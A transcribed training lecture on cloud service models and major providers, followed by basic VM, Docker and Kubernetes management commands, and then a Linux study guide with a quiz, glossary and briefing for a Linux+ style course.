The next is Microsoft Azure Virtual Machines, essentially the equivalent of AWS EC2: it provides a range of virtual machine sizes and configurations, supporting both Windows and Linux operating systems. And then we have Google Compute Engine, Google's version of the same thing, offering scalable, flexible compute resources for running large-scale workloads on Google's infrastructure. Next is Platform as a Service (PaaS), the next level up: if we look at Infrastructure as a Service as the base level — because they're providing the infrastructure — Platform as a Service is a development and deployment environment in the cloud. It provides you with the tools and services to build, test, deploy, and manage applications without worrying about the underlying infrastructure — the virtual machines and the physical hardware required — so you're just using the provider's platform to develop, deploy, and test your applications. It's the next level up from buying or renting infrastructure. Elastic Beanstalk is the AWS version, which helps you develop, scale, and deploy web applications and services using popular languages. Google App Engine is the Google version, which helps you deploy applications on Google's infrastructure with automatic scaling and management. And Microsoft's version is Azure App Service, which helps developers build, deploy, and scale web apps and APIs quickly, with integrated support for various development languages. These three companies essentially offer the same thing across the board — the platforms have different interfaces, some more user-friendly than others, but for the most part they offer similar services. Then you have Software as a Service (SaaS): if infrastructure is the base level and platform is the next level, software is the level above that — applications delivered over the internet on a subscription basis, accessed via a web browser without the need to install or maintain anything; you just log in. Microsoft Office 365 is one of the most common examples: access to Microsoft Office — Word, Excel, PowerPoint, and so on. It's very similar to Google Drive, another SaaS offering, where you get access to Google Sheets and Google Docs and so on — you're using the software now: the software is the word processor, the spreadsheet creator and editor. These connect to OneDrive and Teams: Teams is the sharing and collaboration portion of Office 365, and OneDrive is the storage portion — again, very similar to Google Drive. Google Workspace is the SaaS bundle that combines everything — productivity and collaboration, because you're now working with your coworkers and everybody on your team — and inside it are Gmail, Google Drive, Docs, Sheets, and Google Meet, their video-conferencing tool. And then there's Salesforce, a really big one:
it’s a customer relationship management so which is a CRM tool and it helps businesses manage their customer relationships streamline s processes so on and so forth and Salesforce again is a software and it’s actually available on most cloud service providers as well and you can buy a license to it and have it installed on everybody’s local computer so that would kind of be another version of the software as a service so cloud computing as we’ve discussed in multiple instances so far under this uh particular chapter it helps you scale up or scale down right so based on the demands of your uh company you can get a bunch of different softwares deployed to all of your users all of your employees you can have a bunch of different virtual machines launched using the infrastr infrastructure as a service you can have uh the platform launch as well for them to be able to develop code and run uh or test their uh uh Cloud resources or test their applications that they’ve developed so on and so forth and you can do this up or down meaning as your company grows or as your company shrinks and downsizes you can add things with the click of a button or you can remove things with the click of a button very easily scalable in both directions and it’s coste efficient so this is this is one of the big things that companies are like uh one of the main reasons why they go into cloud computing because literally I mean for $20 for $30 a month you can start uh launching something for whatever environment for as much power and processing as you would need instead of buying a $5,000 computer you know what I mean depending on what you’re looking for depending on what you would need the cost The Upfront cost is so much cheaper and then you know when you don’t need it anymore instead of worrying about what to do with that $5,000 computer you just stop paying for the thing and let’s say you used it for 6 months and you don’t need it anymore and now you stop paying for it and you just turn it take it down you know what I mean it’s it’s in the grand scheme of things it’s so much more efficient cost-wise to use cloud computing for a Compu uh for a company especially maybe not for a person just depending on who you are as a person and what you do and what you you need it for maybe you do need it but for the most part for comp companies it’s kind of it’s kind of a no-brainer to go into cloud computing uh to use their services um flexible obviously accessible so cloud services are accessible from anywhere with an internet connection you just need your laptop and now you can log into your cloud service providers your CSP and then from there get access to whatever it is that you were using from your home office for example um they’re reliable they’re available because they have redundant locations so AWS micro uh Amazon’s uh web services they have warehouses all over the globe that house these servers that are connected to the AWS service and if one of those things goes down it just defaults into the next available one in that region and now the whoever the person is that’s using it never has to worry about losing access to what it is that they need to use and this is very very important because the redundancy portion of this the Redundant server warehouses that exist all over the world literally all over the world these redundant warehouses are the main reason why these services are so reliable and available all the time uh Disaster Recovery as long as you have enabled some kind of a backup you will never use your lose your 
As for disaster recovery: as long as you've enabled some kind of backup — and as long as you're paying your bill, that's the other part — you will never lose your data, and you will never lose your service; your web server or application server will always be on and running. And those were just the three major heavy hitters; there are a lot of other cloud service providers that are also very legitimate, with a lot of great resources available — these were just the three big ones. Then there are automatic updates: you don't need to update your computer or the service; it gets updated on your behalf. You don't have to worry about whether your IT team is on top of it — and if you're the sole proprietor, the administrator, and the CEO all in one, you don't have to worry about updating anything, because it's done automatically for you, security patches included. It's all a very convenient process — there are a lot of conveniences to cloud computing, but this is another really big one, because automatic updates carry a lot of security along with the convenience: as things get more streamlined, and as penetration testing is done and the providers upgrade their security infrastructure, you inherit those benefits as well. So cloud computing is a flexible, scalable, cost-efficient, and just plain awesome way of going into virtualization, and you have Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS) — quite the mouthful. I'll show you what that looks like visually; this was the best image I could find — all the others were basically spreadsheets, or pyramids that don't really tell you much. With IaaS, Infrastructure as a Service, you can see this is basically what the web servers — the servers inside those massive warehouses — look like. That's what you're renting, and those machines can host the virtual machines and virtual computers people will use. On top of them, people can install their own operating systems, install their own applications, and develop new applications, and so on. This is the most base-level service you can get; on top of it you can do essentially anything you want, but you need a team of people to do it for you. Then you have Platform as a Service: they give you the servers, obviously, but they also give you the operating systems, so you can launch a Windows machine or a Linux machine directly, instead of launching a bare server and then using your hypervisor to install
the operating systems and then launch them yourself. With PaaS, you launch the operating system with a couple of clicks and you have access to a Linux or Windows computer, and from there you start developing your code or running your business, whatever it may be. And the last one assumes everything is already configured for you: you do no configuration at all — you just launch the application. Google Drive, for example: you launch Google Drive, and that's it. It's the most convenient member of this trio, because very little configuration is required on your behalf; you log into the application and start using the software. So to recap the visual: IaaS requires the most configuration, because somebody needs to use a hypervisor, install the operating systems — Linux, Windows, whatever it is — and launch the virtual machines; SaaS requires the least configuration; and PaaS is the middle ground, where with a couple of clicks you're launching a Linux or Windows machine and then using the applications inside it. That's the trio we have here: infrastructure, platform, and software, each "as a service."

It's probably also a good idea to talk about some of these cloud providers. These are again the big three — Amazon AWS, Microsoft Azure, and Google Cloud. They offer comprehensive lists of services, and they're very comparable to each other; I suppose it comes down to personal taste and preference (and perhaps pricing) where somebody would choose one over another, but for the most part they all offer a similar range of services. AWS is the most popular — believe it or not, Amazon is not just a marketplace; its biggest profit comes from its web services, AWS, because they've built the infrastructure once and now sell access to those resources at a variety of tiers. It includes computing power, storage options, and networking capabilities. (I actually host all my websites through AWS — I don't have one launched for this channel yet, but I did buy the domain for it through AWS, so that's a really cool one.) AWS's computing power, storage options, and networking capabilities make it great for everybody: individual users, enterprises, government entities, and so on. Its key compute services are Elastic Compute Cloud (EC2); Lambda, which is serverless computing — you don't need an actual server; you just get access to computing power through their platform; and Elastic Beanstalk, the Platform as a Service offering. Storage includes the Simple Storage Service (S3), Elastic Block Store, and Glacier for long-term storage. AWS databases span a variety of service levels as well: you have the Relational Database Service (RDS); DynamoDB, the NoSQL database; and Redshift for data warehousing, which falls roughly into cold storage.
Then you have networking: Virtual Private Cloud (VPC), Route 53 for DNS services, and CloudFront for the content delivery network (CDN) — and that's their list of key services. Then there are the management consoles and tools: the AWS Management Console is the interface for managing AWS resources; the AWS CLI is the command-line interface for interacting with their services programmatically and in scripts; and the software development kits (SDKs) integrate AWS services into applications using programming languages. Python SDKs are a very common thing to understand: when you interact with the API of any service, you look for a Python SDK and import it into your project, and that SDK allows you to interact with that service's API. AWS has an SDK — you import it into your Python project and, as long as you have your token and API key to confirm you actually have access to their services, you can interact with your AWS management environment through a variety of APIs. Very cool — and just to let you know, all of these providers have SDKs. Microsoft Azure is the next one, the competitor to AWS, with seamless integration with Microsoft products; Azure offers a wide range of cloud services covering compute, analytics, storage, and networking. For compute and storage you have Azure Virtual Machines; Azure Functions, the serverless computing option; Azure Kubernetes Service, a really big one — a lot of job descriptions actually ask for it; Azure Blob Storage; Azure Disk Storage; and Azure Files. For databases you have Azure SQL Database; Cosmos DB, the NoSQL database; and Azure Database for PostgreSQL and MySQL. Then there are Azure Virtual Network, Azure Load Balancer, and their Content Delivery Network (CDN). Their management tools are the Azure Portal, the command-line interface, and of course the PowerShell scripting language — and they also have an SDK you can work with. And then we have Google Cloud, known for its capabilities in data analytics and machine learning, with a robust set of cloud services that leverage Google's massive infrastructure: computing, storage, and application development. Google Compute Engine, Google Kubernetes Engine, and Cloud Functions all fall under their compute section. Storage covers Cloud Storage, Persistent Disk, Filestore, and Google Drive, for example. Then the databases: Cloud SQL; Cloud Spanner, the distributed relational database; and of course Firestore, the NoSQL document database. Networking covers Virtual Private Cloud (VPC), Cloud Load Balancing, and Cloud CDN. And their management tools: the Cloud Console, the gcloud CLI, and client libraries for integrating with applications in various programming languages — the client libraries being the equivalent of an SDK. As you can tell, every single one of them has a CLI — every decent cloud provider should — and a console, the graphical user interface, for managing all of your resources and assets.
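As a taste of what "interacting programmatically" means, here's a minimal sketch using the AWS CLI — assuming it's installed and configured with credentials via `aws configure`, and that the instance ID shown is hypothetical:

```bash
# List your S3 buckets
aws s3 ls

# Describe the EC2 instances in your account
aws ec2 describe-instances

# Start a specific instance by its (hypothetical) ID
aws ec2 start-instances --instance-ids i-0abcd1234efgh5678
```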
These platforms are obviously scalable and obviously cost-efficient; we've talked about all these things already: flexibility, security, all of those things. Then there are the advanced services, like the AI stuff, the machine learning stuff, and the big data analytics, enabling you to innovate and stay competitive. It's becoming more and more required, to be competitive in the modern business world, to have some kind of AI assistant or some kind of AI integration with your infrastructure, to make things more efficient and respond faster; machine learning, to stay on top of your competition with the research that's being done and to improve your data sets and your infrastructure, because machines learn faster, better, and more consistently than human beings do; and then the big data analytics stuff, because it's very crazy how much data actually exists in the world and how important it is to be able to ingest all of that data and make sense of it. These things are connected to each other: the big data analytics is connected to the machine learning, which is done by an AI. All of those things are interconnected, and I feel like they're almost mandatory at this stage of the modern technology world and how technology has been connected to business. If you want to be really, really good as a cyber security person, an administrator, a tech person, you need to get comfortable with the concepts of machine learning, big data, and AI integrations, so that you can stay ahead of the curve when it comes down to your competition inside the IT, cyber security, pentesting, and system administration world. In summary, we've got these major cloud providers, but they are not the only ones, and I would challenge you to Google what the major cloud providers are and see what you can find out there and how they rank as far as their competitiveness against these big three. There are a lot of tools available, as we already talked about: there's infrastructure, platform, as well as software available as a service, and they have a lot of great management tools, including the consoles, the command-line interfaces, and the SDKs, the software development kits that integrate well with programming languages to provide further automation capabilities. And these are the big three, as we talked about.

All right, so you've got your VMs up, you've got your containers and all the things that are provided to you by your virtual environment; how do you manage these things? That's what we're going to talk about. libvirt would be the first command-line toolkit that's available to us. It's a toolkit, accessed via an API, that is used for interacting with VMs across a bunch of different platforms like KVM, QEMU, Xen, and VMware. It's consistent, because it works across all of these different platforms, and it's a very popular choice. We've already mentioned it, actually; hopefully you remember, as we talked about the virtualization portion earlier, we did mention libvirt already. It offers a unified API for managing VMs across different hypervisors; as a result, it simplifies VM management and makes it so that a consistent set of commands and tools basically works everywhere, no matter where you are and what you're using as your virtualization technology. virsh would be one of the key tools that comes with libvirt, and then virt-install is the command-line tool for creating and installing a new virtual machine. So these are the two command-line tools
that come with libvirt. And it's compatible, again, as we already talked about: it works with the various virtualization technologies, making it a versatile tool for various virtualization environments. This is kind of what a command looks like when using libvirt, specifically to create a virtual machine, and there are a few elements here that we need to go over. virt-install would be the command-line tool to install a new machine; the name is what you're going to give it; then there's how much memory should be allocated to it; the vCPUs that would be allocated to it; the disk, which is the path that's going to be used for this particular disk; and then the variant of the OS that you're going to be installing, which is essentially the OS image that you want to use to complete your installation. So this is the full breakdown: we have virt-install, which creates and installs a new virtual machine inside libvirt; then you have the name that you're going to give it, so what you want the virtual machine to be called; the allocation of 2048 megabytes of RAM to this particular VM, which is basically 2 gigs' worth of RAM that you're giving to this virtual machine; the processing power that it has, the vCPUs, the virtual CPUs that are going to be assigned to this virtual machine, which in this case is two; then the path, the disk image for the VM, with a size of 20 gigabytes (the 20 GB in this particular case is storage, so we're not talking about RAM or CPU processing power, just storage for this particular machine); and then, of course, the OS variant, the operating system for this particular case, which is Ubuntu 20.04. That's how you create a new virtual machine using virt-install inside libvirt. And this is the full thing if we were to actually provide some fillers: the name would be my-ubuntu-vm, with the same RAM capacity and the same vCPUs that we're assigning to it, the full path that's going to this thing, 20 gigs of storage allocated to it, and the Ubuntu OS variant. And, wow, look at that, there's a CD-ROM image as well: in this particular case the installer is being pulled from a CD-ROM path, so this OS variant is being installed from that particular CD-ROM image. And this is how you destroy one (I love that word): you destroy a virtual machine using virsh destroy. So virt-install is how you create one, and to destroy it you would need to use virsh. Again, you just give it the virtual machine name, so my-ubuntu-vm would be the name we give it, and it destroys it: it forcibly stops the specified VM with the name that you provide. my-ubuntu-vm, in this particular case, is being destroyed. If you wanted to list your virtual machines, you would run virsh list --all, and it lists everything that's being managed by libvirt, showing their IDs, their names, and their current state: whether they're running, paused, or shut off.
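To make that concrete, here's a minimal sketch of the flow just described. The VM name, disk path, and ISO path are placeholders for this example, and the exact --os-variant value depends on the osinfo database on your system:

    virt-install \
      --name my-ubuntu-vm \
      --memory 2048 \
      --vcpus 2 \
      --disk path=/var/lib/libvirt/images/my-ubuntu-vm.qcow2,size=20 \
      --os-variant ubuntu20.04 \
      --cdrom /var/lib/libvirt/images/ubuntu-20.04.iso

    virsh destroy my-ubuntu-vm     # forcibly stop the named VM
    virsh list --all               # list every VM libvirt manages: ID, name, and state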
In the example output for that, you've got three in this particular case: the my-ubuntu-vm, the test virtual machine, and the old virtual machine. Because one of them is shut off and one is paused, their IDs are not activated; the only one that actually has an ID associated with it is the one that's currently running. That's the output you would get from listing all virtual machines with virsh. So this is the flow that we've got. As another example, we want to create a virtual machine, in this case my-centos (CentOS being one of the Red Hat distributions of Linux). There are 4 GB of RAM assigned to this particular one, there are four vCPUs assigned to it, the disk location (the path to this VM) is given, there are 40 GB of storage assigned to it, the OS variant is CentOS, and it's being pulled from the CD-ROM path for the CentOS installation that has the ISO image on it. And that's it; this is how you install one with CentOS. If you wanted to destroy that same machine, you would use virsh destroy; so again, virt-install installs this one, virsh destroy is the one we use to destroy it, and it immediately stops it. And if you want to list everything, you use the virsh list --all command. So libvirt is the toolkit for managing virtual machines across a variety of virtualization platforms. It's consistent, meaning that you can use those same exact commands across a variety of different hypervisors and virtualization environments, and all of those commands will run exactly as they are. You have virsh for the management and virt-install for the installation of the various virtual machines that you've got. And that's our summary of commands, so 3, 2, 1, moving on.

Okay, so now we've got to manage our Dockers. Or, excuse me, the containers of Docker, my bad: Docker is the tool, and the containers are the stuff that we manage with the Docker tool. Docker simplifies the deployment and management of applications, which are stored inside these containers, along with the microservices and the architectures around them; it packages applications together with all of their dependencies inside their isolated containers. So you have Docker, which is the tool, and the container, which houses the applications, the dependencies of those applications, and everything else that would be used in something called a microservice. Take that Ubuntu example that we saw earlier: a container would just run the various applications and the dependencies that would be ingrained inside an Ubuntu environment, without actually launching an Ubuntu operating system. You would pull the image, meaning download it from Docker Hub, which is hosted on a variety of different cloud service providers, or really from any other container registry, onto your actual local machine, your computer. For example, we're going to pull nginx in this particular case, pulling that image onto our local machine. And then you want to run it: you start the new container in detached mode, meaning that it's going to run in the background, replacing the placeholder with the name of the Docker image that you want to use, for example the nginx that we had in the previous case. So run nginx, and it'll run the nginx container in the background and return the container ID for you. Once you have that, you can do a variety of different things with that container, like run it and actually use it, and then, when you're done with it, you can remove it.
To remove a container, you would need to provide the container ID. We got the container ID by running the container in the background, and you can also run the list command, as we saw, to get the list of the containers that you have as well as their container IDs. Then you can use the rm command to remove a container by its ID, or the rmi command to remove the named image that you downloaded. So docker rm my-container, in this particular case, would be the one that removes the container; my-container would be the name, I would assume, rather than the container ID itself. Then we have the logs of those containers. docker logs retrieves the logs of the specified container, which does not mean that it's displaying the contents of some log file you'd otherwise need to open with Nano or some kind of text editor or viewer, or, let's say, an IDE or a SIEM tool, something like that. Essentially, you can view all of the logs that are associated with that individual container, meaning the authentication and authorization log entries, the logs for any errors that may have taken place, or just regular interactions that were done with that particular container; you can retrieve all of those via the logs command. So the logs of my-container would be retrieved by running docker logs my-container. Then you have docker ps, which lists all of the currently running containers. This is how you get the actual container names, their IDs, their statuses, and any other details, and it's how you get the ID to be able to remove a container, for example, or to get the logs from it. In the example output (I know it's a little bit small), this is where the container ID is listed; you have the image, which is nginx in this case; the command entry, which is the Docker entrypoint (it actually runs much longer than what's shown); the fact that it was created 2 hours ago and has been up for 2 hours; there are no ports associated with it because it's running on the local machine; and then the name, serene_bassi, that has been associated with this nginx server. Then there's docker ps -a: not PSA as in public service announcement, but ps -a, the listing of all of the containers, including the ones that are stopped. We had docker ps, which shows the stuff that's currently running; docker ps -a will show you everything, including the ones that are stopped, paused, or otherwise deactivated, and you would see what their IDs and names are, and so on and so forth. And then you can stop one that's currently running: if you wanted to stop it, docker stop, and then give it the container ID. These are very, very easy commands to remember, but you already have this video as a cheat sheet as well. So it stops serene_bassi; that was the name that was associated with it, but the container ID is a separate piece. There's a little bit of a glitch in those instructions, so my bad on this particular case, but you get it: if the command takes the container ID, you would need to give it the container ID, not the nickname that has been assigned to it, which is serene_bassi in this particular case.
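Putting the commands above into one lifecycle sketch (nginx is the example image; the container ID placeholder must be replaced with the ID that docker run or docker ps reports on your machine):

    docker pull nginx             # download the nginx image from Docker Hub
    docker run -d nginx           # start a container in the background; prints its container ID
    docker ps                     # list running containers (IDs, image, status, names)
    docker ps -a                  # list all containers, including stopped ones
    docker logs <container-id>    # print everything that container has logged
    docker stop <container-id>    # stop the running container
    docker rm <container-id>      # remove the stopped container
    docker rmi nginx              # remove the image itself once no container uses it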
If you want to remove the image itself by its name, then you would do docker rmi and give it the image name, which in this particular case is nginx; that is the value we would give the rmi version, with nginx as our example. And so that's it: Docker is the tool that helps you deploy and manage applications that are stored inside containers, and containers house the applications as well as all of their dependencies, to be able to run them. We already went through all of the key commands, and this is just kind of the cheat sheet for you: to pull an image, meaning download it onto your local machine, you would use docker pull; to run it, you would do docker run; to remove a container or an image, you would do docker rm or docker rmi; you can do docker ps to list the running containers and docker ps -a to list all of them, including the ones that are not running. And that's basically it as far as Docker itself is concerned.

You also need to learn how to orchestrate, or manage, your containers, to make sure that, number one, they're not past their life cycle, and that if they're done being used, you get rid of them, especially in a large-scale environment, because it does take up a lot of storage to run something like that. Kubernetes is something that is used for that, for the orchestration of the containers that would be in that environment, and Docker Swarm is another one. They can help you automate the deployment, the scaling up or scaling down, and the management of containerized applications, to make sure they're running when they need to, that they're efficient, that everything is all good, and that when they're done, you get rid of them. Kubernetes is a very popular one; it's also abbreviated as k8s. It's an open-source platform for automating the deployment, scaling, and management of containerized applications, and it's great for really anything, especially in a large environment. There's automatic deployment and scaling, because it actually works with a variety of different script templates that come into play, as well as rules and policies that you can assign to it. So you can automatically deploy something and say, for this particular nginx image, I want you to create 100 different versions of this and deploy those 100 different versions, and it's very, very good at automatically deploying something like that. You can load-balance and route traffic: based on the traffic size of your environment and the company that you're working with, you can make sure that the physical servers don't crash, because load balancing is very directly related to that. Balancing the load of traffic that's coming in and routing that traffic efficiently means the containers run smoothly, but the physical infrastructure is also running and available without anything crashing; that's basically what load balancing and traffic routing are. Self-healing is an interesting one, because if anything fails to start, it'll just be replaced or automatically restarted, and anything that repeatedly isn't working will be killed. I love that: it kills containers that don't respond to user-defined health checks, and it doesn't advertise them to clients until they are ready to serve. So it'll just do everything that it needs to do, and once a container is actually ready for the person who wants to use it, it'll say, this is ready to serve; but until then, in the background, it'll restart something, heal it if that needs to be done, or kill it and wipe it, go get a version of it that's working, bring it up,
and then give it to the client or the user, so that they can actually use it. It can also help you manage the storage, to make sure that persistent storage is actually deployed as needed and mounted as it's needed; this is all something that Kubernetes does beautifully, automatically, so to speak. Then there's the security portion of this: if you have sensitive information, which a lot of people do, like passwords and API keys, it helps you manage those things securely, which basically means either it won't display them or, if it does display them, it'll be done as hashed or encrypted values that look like a bunch of randomized text that nobody can make sense of, and they can't be decrypted without the key that has been assigned to the administrator or to the user. Without that key, there's no way to decrypt or decode those contents, because a very nice algorithm has been used for the encryption, and there's a key attached to it.

Docker Swarm is Docker's native clustering and orchestration tool. It essentially does what Kubernetes does, it's just a little bit simpler, and it helps you orchestrate and manage your containers, especially in environments that are already using Docker. There's simplified setup and management, and it's integrated seamlessly with the Docker tools, so it actually works very well if you're already using Docker in your particular environment. There's the ability to scale your services up or down, very similar to Kubernetes, by adjusting the number of replicas, as I already mentioned: you can just say, I want you to create 50 versions of this, 100 versions of this, and so on. Load balancing is the same thing: it'll help with the network traffic so that these services don't crash or overexert the physical infrastructure. And it's secure by default, meaning that it actually has TLS encryption, the more advanced version of SSL encryption that typically runs on top of port 443 for HTTPS web traffic. TLS is a very powerful encryption standard for secure communication between nodes in the swarm cluster, which is a very fancy way of saying the variety of different containers or tools that are trying to communicate with each other inside this massive environment; it provides secure, encrypted conversation between all of these various nodes, these various containers, and it does it seamlessly and securely.

To do all of these things with Kubernetes, as an example, if you want to deploy an nginx environment: kubectl is the command that interacts with Kubernetes. You do kubectl create deployment with the name nginx and the nginx image, and it creates a deployment named nginx using the official nginx image; very, very simple to do. Scaling it is very interesting, and a lot of these things can also be embedded inside scripts, so you just run the script and it'll do this for you; but again, you scale the deployment of nginx and multiply it by three, so it scales this nginx deployment to three replicas. How easy is that? That's crazy. Then, if you wanted to get the pods, you list all the pods that are running in the cluster, which essentially contain these three replicas, or as many replicas as you would have; you would list all of the pods contained in that cluster.
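To make those three steps concrete, here is a minimal sketch, assuming kubectl is installed and pointed at a running cluster:

    kubectl create deployment nginx --image=nginx   # deployment named nginx from the official image
    kubectl scale deployment nginx --replicas=3     # scale it out to three replicas
    kubectl get pods                                # list the pods running in the cluster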
Then the Docker version of it would be to use the swarm initialization first: you need to use Docker to actually initialize the swarm (docker swarm init), and then you interact with that swarm cluster. You do the service creation and give it a name, web in this particular case; you're going to create three replicas, it's going to be on port 80, and it's going to be nginx: docker service create --name web --replicas 3 -p 80:80 nginx. It creates a service named web with three replicas using the nginx image in this particular case, and maps port 80 on the host to port 80 on the container, meaning that's what's actually used for web traffic. Port 80 is for HTTP traffic, so it's only appropriate that we use port 80 for the web service that has been created with Docker Swarm. If you want to list all of the services, you would just use docker service ls, which is very intuitive coming from Linux, because ls is the command that we use to list anything inside of Linux directories. And that's it for container orchestration. These two tools obviously go much deeper, and there is a lot of documentation and a lot of tutorials available for both Docker Swarm and Kubernetes; I just want you to know about them, so if you wanted to do more homework and self-teaching, you know where to go and what you're supposed to look for. They're very powerful tools, because they both automate the deployment of multiple replicas, as we said, of anything really: it could be a Linux virtual machine, it could be an nginx web server, it could be anything that can virtually be deployed inside a container, and it would be done times a thousand if needed. It's as simple as saying, hey, create replicas equals 1000, and then all of a sudden you have a thousand replicas of that same container. So Kubernetes and Docker Swarm are a very, very powerful series of tools, and there are obviously other container orchestration tools as well; these are just the most popular and the most relevant to the conversations that we've had. I do encourage you to check into the orchestration of containers using Docker Swarm, Kubernetes, or anything that would be similar to them, because it would make you much more functional as a Linux administrator and overall as just a system administrator.

This training series is sponsored by Hackaholics Anonymous. To get the supporting materials for this series, like the 900-page slideshow, the 200-page notes document, and all of the pre-made shell scripts, consider joining the Agent tier of Hackaholics Anonymous. You'll also get monthly Python automations, exclusive content, and direct access to me via Discord. Join Hackaholics Anonymous today.

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Linux System Administration: Permissions, Partitions, and Security

    Linux System Administration: Permissions, Partitions, and Security

    This resource is a guide to Linux system administration, covering essential topics for the Linux+ certification. It thoroughly explains system architecture, including the file system hierarchy and key directories, as well as boot processes. The text also discusses partition management, detailing file system types, mount points, and commands for manipulating disk partitions. User and group management, file permissions, and special permissions are all explained. Finally, the document explains monitoring system performance and managing processes via command line tools.

    Linux Study Guide

    Quiz

    Instructions: Answer each question in 2-3 sentences.

    1. What is the role of Linus Torvalds in the Linux operating system, and what title was given to him?
    2. Explain the difference between the Linux kernel and a Linux distribution (distro). Provide two examples of popular Linux distros.
    3. Name three common uses for Linux operating systems, beyond desktop computing.
    4. Describe the purpose of the /bin and /sbin directories. What is the key distinction between them regarding user access?
    5. What is the purpose of /dev/null and /dev/zero?
    6. Briefly explain the function of journaling in file systems like EXT4 and XFS.
    7. What are the key differences between the FAT32 and NTFS file systems? What are the common use cases of each file system?
    8. Explain the roles of the kernel, the shell, and the user space in the Linux system architecture.
    9. What is the purpose of the /etc/fstab file?
    10. Explain the difference between a hard link and a symbolic link (soft link) in Linux.

    Quiz Answer Key

    1. Linus Torvalds is the creator of the Linux kernel and maintains ultimate authority over its development. He is known as the “benevolent dictator of Planet Linux,” as his approval is needed for incorporating code into the kernel.
    2. The Linux kernel is the core of the operating system, while a Linux distribution (distro) is a complete OS that bundles the kernel with other software, utilities, and a desktop environment. Ubuntu and Kali Linux are two examples of popular Linux distributions.
    3. Linux operating systems are used in servers (web, database), embedded systems (IoT devices, routers), and cloud computing platforms (AWS, Google Cloud).
    4. The /bin directory contains essential binary executables accessible to all users, while the /sbin directory holds system binaries used for administration, which typically require root privileges.
    5. /dev/null is a “black hole” that discards any data written to it, often used to suppress output. /dev/zero produces an infinite stream of null characters, useful for initializing storage or testing memory.
    6. Journaling is a feature that records file system changes in a journal before they are applied. This improves data integrity and recoverability in case of a system crash or power failure.
    7. FAT32 is an older file system with limited file size support, primarily used for USB drives. NTFS is a modern file system used by Windows, offering security features, compression, and large file support, but typically only accessible by Windows.
    8. The kernel manages system resources and communication between hardware and software. The shell is a command-line interpreter allowing users to interact with the kernel. The user space is where user-level applications execute, isolated from the kernel for stability and security.
    9. The /etc/fstab file contains a list of file systems that should be automatically mounted at boot time, along with their mount points and options.
10. A hard link is a direct reference to a file’s data, creating a duplicate entry. A symbolic link (soft link) is a file that stores the path to another file, acting as a shortcut.

    Essay Questions

    1. Discuss the advantages and disadvantages of using Linux in an enterprise environment compared to other operating systems. Consider factors like cost, stability, security, and the availability of support.
    2. Explain the importance of file permissions in Linux. How do traditional file permissions (user, group, other) and special permissions (SUID, GUID, sticky bit) contribute to system security and access control?
    3. Compare and contrast the systemd and SysVinit initialization systems. What are the key benefits of systemd over SysVinit, and why has it become the standard in modern Linux distributions?
    4. Describe the process of partitioning a hard drive in Linux. What are the differences between primary, extended, and logical partitions, and how are they used to organize a file system?
    5. Explain how shell scripting can be used to automate system administration tasks in Linux. Provide examples of common scripting tasks and discuss the advantages of using scripts over manual commands.

    Glossary of Key Terms

    • Binaries: Executable files containing compiled code.
    • BIOS (Basic Input/Output System): Firmware used to perform hardware initialization during the booting process on older systems.
    • Bootloader: Software that loads the operating system kernel.
    • CLI (Command Line Interface): A text-based interface for interacting with the operating system.
    • Daemon: A background process that runs without direct user interaction.
    • Dev: Directory containing device files, providing a virtual interface to hardware.
    • Distro (Distribution): A complete Linux operating system that includes the kernel and additional software.
    • EXT4 (Fourth Extended Filesystem): A journaling file system commonly used in Linux.
    • FHS (Filesystem Hierarchy Standard): A standard that defines the directory structure and contents in Linux.
    • File System: A method of organizing and storing files on a storage device.
    • GPT (GUID Partition Table): A partitioning scheme that supports larger disk sizes and more partitions than MBR.
    • GNU: An open-source, Unix-like operating system.
    • GUI (Graphical User Interface): A visual interface for interacting with the operating system.
    • Kernel: The core of the Linux operating system.
    • Linux: An open-source operating system kernel.
    • Mount Point: A directory where a file system is attached to the directory tree.
    • MBR (Master Boot Record): A traditional partitioning scheme that limits the number of partitions on a disk.
• NAS (Network-Attached Storage): A storage server that attaches to a network and enables multiple users to access the same data.
    • NTFS (New Technology File System): The file system used by modern Windows operating systems.
    • Open Source: Software with source code that is freely available and can be modified and distributed.
    • Partition: A section of a hard drive or other storage device.
    • Process: An instance of a program that is running in memory.
    • Root: The top-level directory in the Linux file system, represented by /.
    • Sbin: System binaries; executables used for system administration.
    • Shell: A command-line interpreter that allows users to interact with the kernel.
    • SUID (Set User ID): A special permission that allows a program to be executed with the privileges of its owner.
    • Swap Space: Disk space used as virtual memory when RAM is full.
• Symbolic Link (Soft Link): A file that stores the path to another file, acting as a shortcut.
    • Systemd: A system and service manager for Linux.
    • UEFI (Unified Extensible Firmware Interface): A modern firmware interface used to initialize hardware during the booting process.
    • User Space: The environment where user-level applications execute, isolated from the kernel.
    • XFS: A high-performance journaling file system commonly used in enterprise environments.

    Linux Fundamentals and System Administration Training

    Okay, here’s a detailed briefing document summarizing the main themes and important ideas from the provided excerpts.

    Briefing Document: Linux Fundamentals and Administration

    Overview:

    This document summarizes a comprehensive training on Linux fundamentals and system administration. The training covers a wide range of topics, from the history of Linux and its various distributions to file system management, process management, user authentication, and scripting. The primary focus is on equipping users with the knowledge and practical skills necessary to effectively navigate, manage, and secure Linux systems. The training utilizes a lecture format coupled with practical command-line exercises. Access to supplemental materials, including a detailed Google Document and an extensive slide presentation, is offered as part of a membership program.

    Main Themes & Key Ideas:

    1. Linux History and Distributions:
• Linux was created as a free and open-source alternative to Minix/Unix, spearheaded by Linus Torvalds and Richard Stallman. “the goals for this were to make it free, make it an open-source alternative to Minix, which was based on Unix, and that’s the guy, Linus Torvalds; he’s still around and he’s still the father of Linux.”
    • Linux Distributions (Distros) bundle the Linux kernel with other software, each tailored for specific purposes.
    • Popular Distros include:
• Ubuntu: User-friendly, for general users and desktop environments. “Ubuntu, which is the most commonly used; it’s popular for general users, beginners, and people who want to use Linux in the desktop environment”
• CentOS/Red Hat Enterprise Linux (RHEL): Stable, supported, for enterprise environments. “CentOS, aka Red Hat Enterprise Linux or RHEL; these things are used in enterprise environments, so they’re mainly for stability and support”
• Debian: Servers and advanced users, often command-line focused. “Debian is known for servers and advanced users, mostly because of the fact that you’re not going to get a graphical user interface”
• Fedora: Cutting-edge, for developers. “Fedora, which is great for developers; it’s more cutting edge and it has a lot of innovations and utilities that are pre-installed on it”
• Kali Linux: Cyber security and ethical hacking. “Kali Linux, and it’s for cyber security and ethical hackers, which is us, everybody that comes on this channel”
• Linux has common uses in servers, embedded systems/IoT devices, software development, cyber security, cloud, and data centers. “servers, embedded systems, and IoT devices; IoT devices are Internet of Things [devices]”
